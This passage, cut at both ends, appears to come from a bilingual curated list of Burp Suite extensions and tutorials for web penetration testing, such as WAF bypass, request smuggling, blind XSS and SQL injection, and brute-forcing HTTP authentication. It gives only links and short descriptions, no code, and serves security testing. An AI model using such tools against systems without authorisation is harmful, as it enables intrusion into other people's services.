I Use to Hack Web Sites](https://trustfoundry.net/the-top-8-burp-suite-extensions-that-i-use-to-hack-web-sites/) - 2014.08 [insinuator] [ERNW’s Top 9 Burp Plugins](https://insinuator.net/2014/08/ernws-top-9-burp-plugins/) # <a id="ae80582b8823a66f4a44521a83cad5a5"></a>Burp组件 *** ## <a id="e0b6358d9096e96238b76258482a1c2f"></a>Collaborator ### <a id="93941e987724e5628e5c99b464df1593"></a>工具 - [**142**星][8m] [Py] [integrity-sa/burpcollaborator-docker](https://github.com/integrity-sa/burpcollaborator-docker) a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate - [**91**星][2y] [Java] [federicodotta/handycollaborator](https://github.com/federicodotta/handycollaborator) Burp Suite plugin created for using Collaborator tool during manual testing in a comfortable way! - [**71**星][4m] [Java] [netspi/burpcollaboratordnstunnel](https://github.com/netspi/burpcollaboratordnstunnel) A DNS tunnel utilizing the Burp Collaborator - [**52**星][5y] [Py] [jfoote/burp-git-bridge](https://github.com/jfoote/burp-git-bridge) Store Burp data and collaborate via git - [**40**星][2y] [Java] [bit4woo/burp_collaborator_http_api](https://github.com/bit4woo/burp_collaborator_http_api) 基于Burp Collaborator的HTTP API - [**32**星][1m] [Shell] [putsi/privatecollaborator](https://github.com/putsi/privatecollaborator) A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate - [**31**星][3y] [Java] [silentsignal/burp-collab-gw](https://github.com/silentsignal/burp-collab-gw) Simple socket-based gateway to the Burp Collaborator - [**25**星][23d] [Java] [portswigger/taborator](https://github.com/portswigger/taborator) A Burp extension to show the Collaborator client in a tab - [**18**星][2y] [HCL] [4armed/terraform-burp-collaborator](https://github.com/4armed/terraform-burp-collaborator) Terraform configuration to build a Burp Private Collaborator Server - [**9**星][23d] [Java] [hackvertor/taborator](https://github.com/hackvertor/taborator) A Burp extension to show the Collaborator client in a tab ### <a id="68fb724c7d9a5b64518906674ffd0fc3"></a>文章 - 2019.06 [bugbountywriteup] [Deploy a private Burp Collaborator Server in Azure](https://medium.com/p/f0d932ae1d70) - 2019.06 [0x00sec] [Achieving Persistent Access to Burp Collaborator Sessions](https://0x00sec.org/t/achieving-persistent-access-to-burp-collaborator-sessions/14311) - 2019.01 [freebuf] [Burpsuite Collaborato模块详解](https://www.freebuf.com/news/193447.html) - 2018.06 [integrity] [CVE-2018-10377 - Insufficient Validation of Burp Collaborator Server Certificate](https://labs.integrity.pt/advisories/cve-2018-10377/) - 2018.05 [aliyun] [基于Burp Collaborator的HTTP API](https://xz.aliyun.com/t/2353) - 2018.05 [tevora] [Blind Command Injection Testing with Burp Collaborator](http://threat.tevora.com/stop-collaborate-and-listen/) - 2018.04 [aliyun] [如何搭建自己的 Burp Collaborator 服务器](https://xz.aliyun.com/t/2267) - 2018.03 [4hou] [使用BurpSuite的Collaborator查找.Onion隐藏服务的真实IP地址](http://www.4hou.com/technology/10367.html) - 2017.11 [digitalforensicstips] [Using Burp Suite’s Collaborator to Find the True IP Address for a .Onion Hidden Service](http://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/) - 2017.09 [netspi] [BurpCollaboratorDNSTunnel 介绍](https://blog.netspi.com/dns-tunneling-with-burp-collaborator/) - 2017.09 [freebuf] [Handy Collaborator :用于挖掘out-of-band类漏洞的Burp插件介绍](http://www.freebuf.com/sectool/147948.html) - 2017.09 [mediaservice] [HandyCollaborator介绍](https://techblog.mediaservice.net/2017/09/handy-collaborator-because-burp-suite-collaborator-is-useful-also-during-manual-testing/) - 2017.04 [] [Build a Private Burp Collaborator Server on AWS with Terraform and Ansible](https://www.4armed.com/blog/burp-collaborator-terraform-ansible/) - 2017.01 [360] [超越检测:利用Burp Collaborator执行SQL盲注](https://www.anquanke.com/post/id/85297/) - 2017.01 [silentsignal] [Beyond detection: exploiting blind SQL injections with Burp Collaborator](https://blog.silentsignal.eu/2017/01/03/beyond-detection-exploiting-blind-sql-injections-with-burp-collaborator/) - 2016.07 [] [Burpsuite之Burp Collaborator模块介绍](http://www.91ri.org/16159.html) - 2015.04 [portswigger] [Introducing Burp Collaborator | Blog](https://portswigger.net/blog/introducing-burp-collaborator) *** ## <a id="4a321e09485950304240c396765b7cff"></a>Intruder ### <a id="2f3325a08e2a906e0cd9734ad154bc2c"></a>工具 - [**2081**星][1y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) BurpSuite Intruder Payload收集 ### <a id="5d252b1d5093aa46bc0845828af876f7"></a>文章 - 2019.10 [KacperSzurek] [[BURP] Intruder: Jak sprawdzić typ konta?](https://www.youtube.com/watch?v=K1_3WFA3Dmc) - 2019.09 [Nahamsec] [Using BurpSuite's Intruder to find bugs and solve Bug Bounty Notes & Hacker101 CTFs](https://www.youtube.com/watch?v=bm2csJKzLOo) - 2018.02 [dustri] [Ghetto recursive payload in the Burp Intruder](https://dustri.org/b/ghetto-recursive-payload-in-the-burp-intruder.html) - 2017.12 [pediy] [[翻译]使用Burp Suite执行更复杂的Intruder攻击](https://bbs.pediy.com/thread-223642.htm) - 2017.12 [trustedsec] [More Complex Intruder Attacks with Burp!](https://www.trustedsec.com/2017/12/complex-intruder-attacks-burp/) - 2017.11 [polaris] [reCAPTCHA:一款自动识别图形验证码并用于Intruder Payload中的BurpSuite插件](http://polaris-lab.com/index.php/archives/387/) - 2016.10 [kalilinuxtutorials] [Burpsuite – Use Burp Intruder to Bruteforce Forms](http://kalilinuxtutorials.com/burp-intruder-bruteforce-forms/) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 07 - Intruder and Comparer](https://www.youtube.com/watch?v=7OXe8THhmao) - 2014.02 [nvisium] [Challenges of Mobile API Signature Forgery with Burp Intruder](https://nvisium.com/blog/2014/02/07/challenges-of-mobile-api-signature/) - 2012.06 [freebuf] [[连载]Burp Suite详细使用教程-Intruder模块详解(3)](http://www.freebuf.com/articles/4184.html) - 2012.06 [freebuf] [[连载]Burp Suite详细使用教程-Intruder模块详解(2)](http://www.freebuf.com/sectool/3693.html) - 2012.06 [freebuf] [[技巧]Burp Intruder中的Timing选项的使用](http://www.freebuf.com/sectool/3369.html) - 2012.05 [freebuf] [Burp Suite详细使用教程-Intruder模块详解](http://www.freebuf.com/sectool/2079.html) - 2011.11 [digi] [Burp Intruder Attack Types](https://digi.ninja/blog/burp_intruder_types.php) - 2011.06 [console] [Burp Intruder Time fields](http://console-cowboys.blogspot.com/2011/06/burp-intruder-time-fields.html) *** ## <a id="a91229e43b5d5e89525d9e5909476e5a"></a>Repeater ### <a id="3ac2c10e6a07ba3171382daa407cf0ea"></a>工具 - [**66**星][19d] [Java] [coreyd97/stepper](https://github.com/coreyd97/stepper) A natural evolution of Burp Suite's Repeater tool - [**52**星][29d] [Java] [portswigger/stepper](https://github.com/portswigger/stepper) A natural evolution of Burp Suite's Repeater tool - [**36**星][1m] [Kotlin] [typeerror/bookmarks](https://github.com/typeerror/bookmarks) A Burp Suite Extension to take back your repeater tabs - [**6**星][6y] [Perl] [allfro/browserrepeater](https://github.com/allfro/browserrepeater) BurpSuite extension for Repeater tool that renders responses in a real browser. ### <a id="131243147e5e83b271d72709d89679cc"></a>文章 - 2019.10 [KacperSzurek] [[BURP] 12 trików do Burp Repeater](https://www.youtube.com/watch?v=-M4bh94Mfyc) - 2019.09 [aliyun] [BurpSuite插件 - AutoRepeater说明](https://xz.aliyun.com/t/6244) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 04 - Repeater Module](https://www.youtube.com/watch?v=9Zh_7s5csCc) *** ## <a id="44e70582b362d67cda62d99d75821115"></a>Extender ### <a id="2dfc04dd9ab94aa56da4b59a6d0f9c18"></a>工具 - [**192**星][2y] [Java] [p3gleg/pwnback](https://github.com/P3GLEG/PwnBack) Burp Extender plugin that generates a sitemap of a website using Wayback Machine - [**143**星][1y] [Java] [tomsteele/burpbuddy](https://github.com/tomsteele/burpbuddy) burpbuddy exposes Burp Suites's extender API over the network through various mediums, with the goal of enabling development in any language without the restrictions of the JVM - [**59**星][5y] [Ruby] [tduehr/buby](https://github.com/tduehr/buby) A JRuby implementation of the BurpExtender interface for PortSwigger Burp Suite. - [**33**星][2y] [Java] [dnet/burp-oauth](https://github.com/dnet/burp-oauth) OAuth plugin for Burp Suite Extender - [**28**星][2y] [Java] [bit4woo/gui_burp_extender_para_encrypter](https://github.com/bit4woo/gui_burp_extender_para_encrypter) Burp_Extender_para_encrypter - [**19**星][1y] [Java] [nccgroup/wcfdser-ngng](https://github.com/nccgroup/wcfdser-ngng) A Burp Extender plugin, that will make binary soap objects readable and modifiable. - [**15**星][4m] [Java] [twelvesec/jdser-dcomp](https://github.com/twelvesec/jdser-dcomp) A Burp Extender plugin that will allow you to tamper with requests containing compressed, serialized java objects. - [**10**星][2y] [Py] [sahildhar/burpextenderpractise](https://github.com/sahildhar/BurpExtenderPractise) burp extender practise - [**6**星][2y] [Java] [secureskytechnology/burpextender-proxyhistory-webui](https://github.com/secureskytechnology/burpextender-proxyhistory-webui) Burp Extender . Proxy History viewer in Web UI - [**4**星][2y] [Java] [pentestpartners/fista](https://github.com/pentestpartners/fista) A Burp Extender plugin allowing decoding of fastinfoset encoded communications. - [**3**星][6y] [Java] [directdefense/noncetracker](https://github.com/directdefense/noncetracker) A Burp extender module that tracks and updates nonce values per a specific application action. ### <a id="dcacf6d1c4c640ba97bcfaf4c441b955"></a>文章 - 2017.05 [trustwave] [Airachnid: Web Cache Deception Burp Extender](https://www.trustwave.com/Resources/SpiderLabs-Blog/Airachnid--Web-Cache-Deception-Burp-Extender/) - 2014.08 [liftsecurity] [Burp Extender With Scala](https://blog.liftsecurity.io/2014/08/23/burp-extender-with-scala/) - 2013.12 [directdefense] [Multiple NONCE (one-time token) Value Tracking with Burp Extender](https://www.directdefense.com/multiple-nonce-one-time-token-value-tracking-burp-extender/) - 2009.04 [portswigger] [Using Burp Extender | Blog](https://portswigger.net/blog/using-burp-extender) - 2008.11 [portswigger] [[MoBP] Burp Extender extended | Blog](https://portswigger.net/blog/mobp-burp-extender-extended) *** ## <a id="43101e4c97bc49a534738ecaa2baef98"></a>Macros ### <a id="4ac6fc3656c94a9161254fb0868dcd24"></a>工具 - [**7**星][2y] [Java] [pajswigger/add-request-to-macro](https://github.com/pajswigger/add-request-to-macro) Burp extension to add a request to a macro ### <a id="1c4a92df43bd77a97cf32192f9051327"></a>文章 - 2019.01 [aliyun] [使用Burp Suite 宏自动化处理 Session 会话](https://xz.aliyun.com/t/3751) - 2018.12 [parsiya] [Tiredful API - Part 1 - Burp Session Validation with Macros](https://parsiya.net/blog/2018-12-11-tiredful-api-part-1-burp-session-validation-with-macros/) - 2018.12 [4hou] [通过Burp Macros自动化平台对Web应用的模糊输入进行处理](http://www.4hou.com/web/14930.html) - 2018.12 [parsiya] [Tiredful API. Part1: 使用宏验证Burp会话](https://parsiya.net/blog/2018-12-11-tiredful-api---part-1---burp-session-validation-with-macros/) - 2017.12 [freebuf] [经验分享 | Burpsuite中宏的使用](http://www.freebuf.com/articles/web/156735.html) - 2017.09 [freebuf] [如何通过BurpSuiteMacro自动化模糊测试Web应用的输入点](http://www.freebuf.com/articles/web/147182.html) - 2017.02 [cyberis] [Creating Macros for Burp Suite](https://www.cyberis.co.uk/burp_macros.html) - 2015.12 [blackhillsinfosec] [Using Simple Burp Macros to Automate Testing](https://www.blackhillsinfosec.com/using-simple-burp-macros-to-automate-testing/) - 2015.11 [gracefulsecurity] [Burp Macros: Automatic Re-authentication](https://www.gracefulsecurity.com/burp-macros-re-authentication/) - 2011.03 [portswigger] [Burp v1.4 preview - Macros | Blog](https://portswigger.net/blog/burp-v1-4-preview-macros) *** ## <a id="48f72e10306e4937d337396dfbb8a679"></a>Extractor - 2018.08 [4hou] [Burp Extractor扩展工具介绍](http://www.4hou.com/tools/12985.html) - 2018.08 [aliyun] [BurpSuite Extender之巧用Marco和Extractor绕过Token限制](https://xz.aliyun.com/t/2547) - 2018.08 [netspi] [Introducing Burp Extractor](https://blog.netspi.com/introducing-burp-extractor/) *** ## <a id="b3e0f002e0d2698844290a8789902b36"></a>Spider - 2017.07 [360] [BurpSuite插件:利用BurpSuite Spider收集子域名和相似域名](https://www.anquanke.com/post/id/86512/) - 2017.07 [polaris] [BurpSuite插件:利用BurpSuite Spider收集子域名和相似域名](http://polaris-lab.com/index.php/archives/349/) - 2017.06 [hackingarticles] [How to Spider Web Applications using Burpsuite](http://www.hackingarticles.in/spider-web-applications-using-burpsuite/) - 2017.02 [HackingMonks] [Web Spidering (Manual and Automated with Burp Suite)](https://www.youtube.com/watch?v=Hr3sdjGZA_U) - 2016.02 [THER] [Learn Burp Suite, the Nr. 1 Web Hacking Tool - 05 - Target and Spider](https://www.youtube.com/watch?v=dCKPZUSOlr8) # <a id="0f39062727a4aad884ef3a2cc6bde85a"></a>平台 *** ## <a id="d0ee432e093709d25c54688996cb632e"></a>Web ### <a id="52627ff036c7677483b148cdc96cc3a7"></a>WAF #### <a id="2db1854f35a2fd18838bd74f007cda5d"></a>工具 - [**421**星][10m] [Java] [nccgroup/burpsuitehttpsmuggler](https://github.com/nccgroup/burpsuitehttpsmuggler) A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques - [**269**星][3y] [Java] [codewatchorg/bypasswaf](https://github.com/codewatchorg/bypasswaf) Add headers to all Burp requests to bypass some WAF products - [**8**星][7m] [Py] [bao7uo/waf-cookie-fetcher](https://github.com/bao7uo/waf-cookie-fetcher) WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp's cookie jar. Requires PhantomJS. #### <a id="948e5b6f1e2a36af39c5f3224b10212a"></a>文章 - 2018.11 [4hou] [利用burp插件Hackvertor绕过waf并破解XOR加密](http://www.4hou.com/tools/14353.html) - 2017.10 [4hou] [Bypass WAF:使用Burp插件绕过一些WAF设备](http://www.4hou.com/tools/8065.html) - 2015.06 [freebuf] [可绕过WAF的Burp Suite插件 – BypassWAF](http://www.freebuf.com/sectool/69988.html) ### <a id="f0728b8e21e86f04c33b8ff8f12ca55f"></a>HTTP/HTTPS #### <a id="7144666e1152e4ddc6034d0643022595"></a>工具 - [**403**星][5m] [Java] [nccgroup/autorepeater](https://github.com/nccgroup/autorepeater) Automated HTTP Request Repeating With Burp Suite - [**396**星][21d] [Java] [portswigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler) an extension for Burp Suite designed to help you launch HTTP Request Smuggling attack - [**391**星][11d] [Kotlin] [portswigger/turbo-intruder](https://github.com/portswigger/turbo-intruder) a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. - [**240**星][2m] [Py] [m4ll0k/burpsuite-secret_finder](https://github.com/m4ll0k/burpsuite-secret_finder) Burp Suite extension to discover apikeys/accesstokens and sensitive data from HTTP response. - [**128**星][15d] [Py] [redhuntlabs/burpsuite-asset_discover](https://github.com/redhuntlabs/burpsuite-asset_discover) Burp Suite extension to discover assets from HTTP response. - [**103**星][2y] [Java] [gosecure/csp-auditor](https://github.com/gosecure/csp-auditor) Burp and ZAP plugin to analyse Content-Security-Policy headers or generate template CSP configuration from crawling a Website - [**69**星][12d] [Java] [c0ny1/httpheadmodifer](https://github.com/c0ny1/httpheadmodifer) 一款快速修改HTTP数据包头的Burp Suite插件 - [**54**星][6m] [Py] [gh0stkey/jsonandhttpp](https://github.com/gh0stkey/JSONandHTTPP) Burp Suite Plugin to convert the json text that returns the body into HTTP request parameters. - [**51**星][2y] [Java] [netspi/burpextractor](https://github.com/netspi/burpextractor) A Burp extension for generic extraction and reuse of data within HTTP requests and responses. - [**33**星][12m] [twelvesec/bearerauthtoken](https://github.com/twelvesec/bearerauthtoken) This burpsuite extender provides a solution on testing Enterprise applications that involve security Authorization tokens into every HTTP requests.Furthermore, this solution provides a better approach to solve the problem of Burp suite automated scanning failures when Authorization tokens exist. - [**30**星][7m] [Java] [bit4woo/burp-api-drops](https://github.com/bit4woo/burp-api-drops) burp suite API 处理http请求和响应的基本流程 - [**29**星][2m] [Java] [ibey0nd/nstproxy](https://github.com/ibey0nd/nstproxy) 一款存储HTTP请求入库的burpsuite插件 - [**13**星][5y] [Py] [enablesecurity/identity-crisis](https://github.com/enablesecurity/identity-crisis) A Burp Suite extension that checks if a particular URL responds differently to various User-Agent headers - [**11**星][3y] [Ruby] [crashgrindrips/burp-dump](https://github.com/crashgrindrips/burp-dump) A Burp plugin to dump HTTP(S) requests/responses to a file system - [**8**星][2y] [Py] [andresriancho/burp-proxy-search](https://github.com/andresriancho/burp-proxy-search) Burp suite HTTP history advanced search - [**8**星][7y] [Java] [cyberisltd/post2json](https://github.com/cyberisltd/post2json) Burp Suite Extension to convert a POST request to JSON message, moving any .NET request verification token to HTTP headers if present - [**8**星][3y] [Java] [eonlight/burpextenderheaderchecks](https://github.com/eonlight/burpextenderheaderchecks) A Burp Suite Extension that adds Header Checks and other helper functionalities - [**6**星][2y] [Java] [stackcrash/burpheaders](https://github.com/stackcrash/burpheaders) Burp extension for checking optional headers - [**6**星][2m] [Java] [iamaldi/rapid](https://github.com/iamaldi/rapid) Rapid is a Burp extension that enables you to save HTTP Request / Response to file in a user friendly text format a lot faster. - [**5**星][3y] [Py] [floyd-fuh/burp-collect500](https://github.com/floyd-fuh/burp-collect500) Burp plugin that collects all HTTP 500 messages - [**3**星][2y] [Py] [externalist/aes-encrypt-decrypt-burp-extender-plugin-example](https://github.com/externalist/aes-encrypt-decrypt-burp-extender-plugin-example) A POC burp extender plugin to seamlessly decrypt/encrypt encrypted HTTP network traffic. #### <a id="f45de03725b766161db27df865129456"></a>文章 - 2019.08 [chawdamrunal] [How i exploit out-of-band resource load (HTTP) using burp suite extension plugin (taborator)](https://medium.com/p/2c5065d6a50b) - 2019.06 [infosecinstitute] [Intercepting HTTPS traffic with Burp Suite](https://resources.infosecinstitute.com/intercepting-https-traffic-with-burp-suite/) - 2019.01 [nxadmin] [Android 7.0+手机burpsuite抓包https](http://www.nxadmin.com/tools/1733.html) - 2018.12 [ecforce] [创建Burp扩展, 使用HMAC签名替换HTTP Header](https://www.secforce.com/blog/2018/12/burp-extension-hmac-signature-in-custom-http-header/) - 2018.06 [NetworkHeros] [Ethical Hacking (CEHv10) :Intercept HTTPS (SSL) traffic with Burpsuite](https://www.youtube.com/watch?v=rhJcRqgScz8) - 2018.02 [nxadmin] [ios 11.2.5 burpsuite抓https](http://www.nxadmin.com/mobile-sec/1673.html) - 2018.01 [freebuf] [经验分享 | Burpsuite抓取非HTTP流量](http://www.freebuf.com/articles/network/158589.html) - 2017.12 [freebuf] [如何使用Burp和Magisk在Android 7.0监测HTTPS流量](http://www.freebuf.com/articles/terminal/158492.html) - 2017.12 [nviso] [Intercepting HTTPS Traffic from Apps on Android 7+ using Magisk & Burp](https://blog.nviso.be/2017/12/22/intercepting-https-traffic-from-apps-on-android-7-using-magisk-burp/) - 2017.12 [4hou] [如何使用 Burp 代理调试安卓应用中的 HTTP(S) 流量](http://www.4hou.com/web/9385.html) - 2017.11 [nxadmin] [burpsuite抓包https请求相关](http://www.nxadmin.com/mobile-sec/1646.html) - 2017.03 [HackingMonks] [HTTP Header Injection (Mannual and Burpsuite)](https://www.youtube.com/watch?v=H_nkPmlbDQw) - 2017.03 [HackingMonks] [BurpSuite HTTPS proxy setting (Install CA certificates)](https://www.youtube.com/watch?v=XIRiTDk6Hss) - 2017.01 [hackingarticles] [Hack the Basic HTTP Authentication using Burpsuite](http://www.hackingarticles.in/hack-basic-http-authentication-using-burpsuite/) - 2016.09 [freebuf] [新手教程:如何使用Burpsuite抓取手机APP的HTTPS数据](http://www.freebuf.com/articles/terminal/113940.html) - 2015.10 [g0tmi1k] [DVWA Brute Force (Low Level) - HTTP GET Form [Hydra, Patator, Burp]](http://blog.g0tmi1k.com/dvwa/bruteforce-low/) - 2014.06 [robert] [Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04](https://robert.penz.name/856/howto-install-and-use-the-burp-suite-as-https-proxy-on-ubuntu-14-04/) - 2014.06 [sensepost] [Associating an identity with HTTP requests – a Burp extension](https://sensepost.com/blog/2014/associating-an-identity-with-http-requests-a-burp-extension/) - 2014.02 [trustwave] [“Reversing” Non-Proxy Aware HTTPS Thick Clients w/ Burp](https://www.trustwave.com/Resources/SpiderLabs-Blog/%E2%80%9CReversing%E2%80%9D-Non-Proxy-Aware-HTTPS-Thick-Clients-w/-Burp/) - 2013.10 [agarri] [Exploiting WPAD with Burp Suite and the "HTTP Injector" extension](http://www.agarri.fr/blog/../kom/archives/2013/10/22/exploiting_wpad_with_burp_suite_and_the_http_injector_extension/index.html) - 2013.10 [agarri] [Exploiting WPAD with Burp Suite and the "HTTP Injector" extension](https://www.agarri.fr/blog/archives/2013/10/22/exploiting_wpad_with_burp_suite_and_the_http_injector_extension/index.html) - 2013.02 [freebuf] [Burpsuite教程与技巧之HTTP brute暴力破解](http://www.freebuf.com/articles/web/7457.html) - 2013.02 [freebuf] [AuthTrans(原创工具)+BurpSuite的暴力美学-破解Http Basic认证](http://www.freebuf.com/articles/web/7450.html) - 2012.12 [freebuf] [iPhone上使用Burp Suite捕捉HTTPS通信包方法](http://www.freebuf.com/articles/web/6577.html) ### <a id="7a78bdcffe72cd39b193d93aaec80289"></a>XSS #### <a id="73a4242179040ad255b6c99f75b0206d"></a>工具 - [**308**星][1y] [Java] [elkokc/reflector](https://github.com/elkokc/reflector) Burp 插件,浏览网页时实时查找反射 XSS - [**306**星][3y] [Java] [nvisium/xssvalidator](https://github.com/nvisium/xssvalidator) This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities. - [**166**星][4m] [Py] [wish-i-was/femida](https://github.com/wish-i-was/femida) Automated blind-xss search for Burp Suite - [**102**星][1y] [Java] [mystech7/burp-hunter](https://github.com/mystech7/burp-hunter) XSS Hunter Burp Plugin - [**48**星][11d] [Py] [bitthebyte/bitblinder](https://github.com/bitthebyte/bitblinder) Burp extension helps in finding blind xss vulnerabilities - [**34**星][3y] [Py] [attackercan/burp-xss-sql-plugin](https://github.com/attackercan/burp-xss-sql-plugin) Burp plugin which I used for years which helped me to find several bugbounty-worthy XSSes, OpenRedirects and SQLi. - [**34**星][2m] [JS] [psych0tr1a/elscripto](https://github.com/psych0tr1a/elscripto) XSS explot kit/Blind XSS framework/BurpSuite extension - [**29**星][3y] [Java] [portswigger/xss-validator](https://github.com/portswigger/xss-validator) This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities. - [**24**星][23d] [Py] [jiangsir404/xss-sql-fuzz](https://github.com/jiangsir404/xss-sql-fuzz) burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz - 重复区段: [Fuzz->工具](#3cb057fb3f3cdaca2fc0ac0c8e87be2c) |[SQL->工具](#b90695c04ef9e0a788a2aa07dec6f2b5) | - [**23**星][3m] [Py] [hpd0ger/supertags](https://github.com/hpd0ger/supertags) 一个Burpsuite插件,用于检测隐藏的XSS - [**2**星][3m] [Java] [conanjun/xssblindinjector](https://github.com/conanjun/xssblindinjector) burp插件,实现自动化xss盲打以及xss log #### <a id="108e9a125964cea14b452143bbc4558d"></a>文章 - 2018.05 [freebuf] [Burp Xss Scanner插件开发思路分享(附下载)](http://www.freebuf.com/articles/web/170884.html) - 2017.08 [4hou] [如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞](http://www.4hou.com/vulnerable/6933.html) - 2017.07 [hackingarticles] [Fuzzing SQL,XSS and Command Injection using Burp Suite](http://www.hackingarticles.in/fuzzing-sqlxss-command-injection-using-burp-suite/) - 2017.04 [freebuf] [如何通过BurpSuite检测Blind XSS漏洞](http://www.freebuf.com/articles/web/131545.html) - 2017.04 [agarri] [Exploiting a Blind XSS using Burp Suite](http://www.agarri.fr/blog/../kom/archives/2017/04/04/exploiting_a_blind_xss_using_burp_suite/index.html) - 2017.04 [agarri] [Exploiting a Blind XSS using Burp Suite](https://www.agarri.fr/blog/archives/2017/04/04/exploiting_a_blind_xss_using_burp_suite/index.html) - 2015.12 [toolswatch] [Sleepy Puppy Burp Extension for XSS v1.0](http://www.toolswatch.org/2015/12/sleepy-puppy-burp-extension-for-xss-v1-0/) - 2014.01 [nvisium] [Accurate XSS Detection with BurpSuite and PhantomJS](https://nvisium.com/blog/2014/01/31/accurate-xss-detection-with-burpsuite/) - 2013.07 [cyberis] [Testing .NET MVC for JSON Request XSS - POST2JSON Burp Extension](https://www.cyberis.co.uk/2013/07/testing-net-mvc-for-json-request-xss.html) ### <a id="237219a0d75a05c588409fa422c8ad6f"></a>CSRF #### <a id="3489e71087fdb27f9f13c0f2c9de2f76"></a>工具 - [**12**星][2y] [Java] [ah8r/csrf](https://github.com/ah8r/csrf) CSRF Scanner Extension for Burp Suite Pro #### <a id="aa292bb447f0a2e65fcef7dec5ac15e5"></a>文章 - 2018.01 [4hou] [如何绕过csrf保护,并在burp suite中使用intruder?](http://www.4hou.com/technology/10134.html) - 2017.09 [securestate] [Updating Anti-CSRF Tokens in Burp Suite](https://warroom.securestate.com/updating-anti-csrf-tokens-burp-suite/) - 2017.09 [securestate] [Updating Anti-CSRF Tokens in Burp Suite](https://warroom.rsmus.com/updating-anti-csrf-tokens-burp-suite/) - 2017.01 [360] [使用Burp的intruder功能测试有csrf保护的应用程序](https://www.anquanke.com/post/id/85289/) - 2016.06 [securityblog] [Using Burp Intruder to Test CSRF Protected Applications](http://securityblog.gr/3446/using-burp-intruder-to-test-csrf-protected-applications/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens: Round Two](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens-round-two/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens Part 2: CSRFTEI for Remote Tokens](https://www.gracefulsecurity.com/burp-vs-csrf-tokens-part-2-code/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens/) - 2015.11 [gracefulsecurity] [Burp Suite vs CSRF Tokens: CSRFTEI](https://www.gracefulsecurity.com/burp-suite-vs-csrf-tokens-csrftei/) - 2014.07 [notsosecure] [Pentesting Web Service with anti CSRF token using BurpPro](https://www.notsosecure.com/pentesting-web-service-with-csrf-token-with-burp-pro/) - 2014.02 [nvisium] [Using Burp Intruder to Test CSRF Protected Applications](https://nvisium.com/blog/2014/02/14/using-burp-intruder-to-test-csrf/) - 2012.09 [trustwave] [Adding Anti-CSRF Support to Burp Suite Intruder](https://www.trustwave.com/Resources/SpiderLabs-Blog/Adding-Anti-CSRF-Support-to-Burp-Suite-Intruder/) - 2012.05 [edge] [Testing CSRF aware webapps with Burp](http://edge-security.blogspot.com/2012/05/testing-csrf-aware-webapps-with-burp.html) ### <a id="12918a4607ec282e4299d1eae31af190"></a>REST #### <a id="a28290dd688dc4f5154419e5f9a065a1"></a>工具 - [**307**星][1y] [Java] [vmware/burp-rest-api](https://github.com/vmware/burp-rest-api) REST/JSON API to the Burp Suite security tool. - [**47**星][1y] [Ruby] [pentestgeek/burpcommander](https://github.com/pentestgeek/burpcommander) Ruby command-line interface to Burp Suite's REST API - [**35**星][7y] [Java] [continuumsecurity/resty-burp](https://github.com/continuumsecurity/resty-burp) REST/JSON interface to Burp Suite - [**34**星][3m] [Py] [dionach/headersanalyzer](https://github.com/dionach/headersanalyzer) Burp extension that checks for interesting and security headers - [**13**星][11m] [Py] [anandtiwarics/python-burp-rest-api](https://github.com/anandtiwarics/python-burp-rest-api) Python Package for burprestapi #### <a id="181b3a7182770c6497d5d13b6ee07ba0"></a>文章 - 2018.12 [mindpointgroup] [REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting](https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-3-reporting/) - 2018.11 [mindpointgroup] [使用Burp对REST API进行渗透测试. Part2](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-2-testing/) - 2018.11 [mindpointgroup] [使用Burp Suite对REST API进行渗透测试. Part1:介绍与配置](https://www.mindpointgroup.com/blog/pen-test/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration/) - 2018.11 [doyensec] [Introducing burp-rest-api v2](https://blog.doyensec.com/2018/11/05/burp-rest-api-v2.html) ### <a id="cb76ddb14f3e8ec2348e70f5c69c8e2c"></a>JWT #### <a id="78b23f21484c457bb6e1db08f670a48e"></a>工具 - [**112**星][9d] [Java] [ozzi-/jwt4b](https://github.com/ozzi-/JWT4B) JWT Support for Burp - [**22**星][1m] [Java] [portswigger/json-web-tokens](https://github.com/portswigger/json-web-tokens) JWT Support for Burp - [**7**星][1m] [Java] [lorenzog/burpaddcustomheader](https://github.com/lorenzog/burpaddcustomheader) A Burp Suite extension to add a custom header (e.g. JWT) #### <a id="c6b7af1690555f058a172581c6e52b5c"></a>文章 - 2017.05 [compass] [JWT Burp Extension](https://blog.compass-security.com/2017/05/jwt-burp-extension/) *** ## <a id="91be958abe3c758e22bf7bf29227541b"></a>Windows ### <a id="95cc703af8e447cd065e71053f064ac2"></a>文章 - 2018.03 [nviso] [Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows](https://blog.nviso.be/2018/03/05/intercepting-belgian-eid-pkcs11-traffic-with-burp-suite-on-os-x-kali-windows/) - 2017.02 [HackingMonks] [Burp Suite complete Version (Windows installation)](https://www.youtube.com/watch?v=4--bp4I7GKA) - 2016.02 [parsiya] [Installing Burp Certificate Authority in Windows Certificate 